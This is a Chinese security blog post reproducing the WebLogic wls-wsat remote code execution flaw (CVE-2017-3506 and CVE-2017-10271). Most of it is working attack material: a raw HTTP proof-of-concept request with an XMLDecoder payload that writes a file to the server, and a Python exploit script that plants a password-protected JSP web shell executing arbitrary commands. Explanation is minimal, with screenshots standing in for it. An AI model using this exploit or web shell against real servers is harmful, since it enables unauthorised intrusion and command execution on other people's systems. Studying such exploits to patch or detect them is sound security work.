WebLogic RCE 复现

admin
admin
admin
102932
文章
87
评论
2023年12月15日00:52:44评论11 views字数 2653阅读8分50秒阅读模式

WebLogic Server 组件的 WLS Security 子组件存在安全漏洞, 可造成任意代码执行.

poc

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.100:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 582

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/vuln.jsp</string><void method="println">
                        <string>weblogic</string></void><void method="close"/>
                    </object>
                </java>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

发送代码

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-97.jpg

访问 /bea_wls_internal/vuln.jsp

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-96.jpg

本地查看

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-81.jpg

已经生成成功

exp

import requests
import sys

def exploit(url,filename):
    content = '<% if("weblogic".equals(request.getParameter("pass"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>'
    payload = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/'+filename+'</string><void method="println"><string><![CDATA['+content+']]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Upgrade-Insecure-Requests':'1','Content-Type':'text/xml'}
    response = requests.post(url+'/wls-wsat/CoordinatorPortType',data=payload,headers=headers)
    if response.status_code == 500:
        print 'Shell:',url + '/bea_wls_internal/' + filename + '?pass=weblogic&cmd=whoami'
    else:
        print 'Fail'

if __name__ == '__main__':
    print '[*] WebLogic wls-wsat RCE Exp'
    print '[*] CVE-2017-3506 & CVE-2017-10271'
    print
    if len(sys.argv) == 3:
        exploit(sys.argv[1],sys.argv[2])
    else:
        print 'Usage: WebLogic_Exp.py url shell.jsp'

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-51.jpg

backdoor.jsp

http://cn-sec.com/wp-content/uploads/2023/12/20231214161632-11.jpg

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:52:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WebLogic RCE 复现https://cn-sec.com/archives/2301336.html

发表评论

匿名网友 填写信息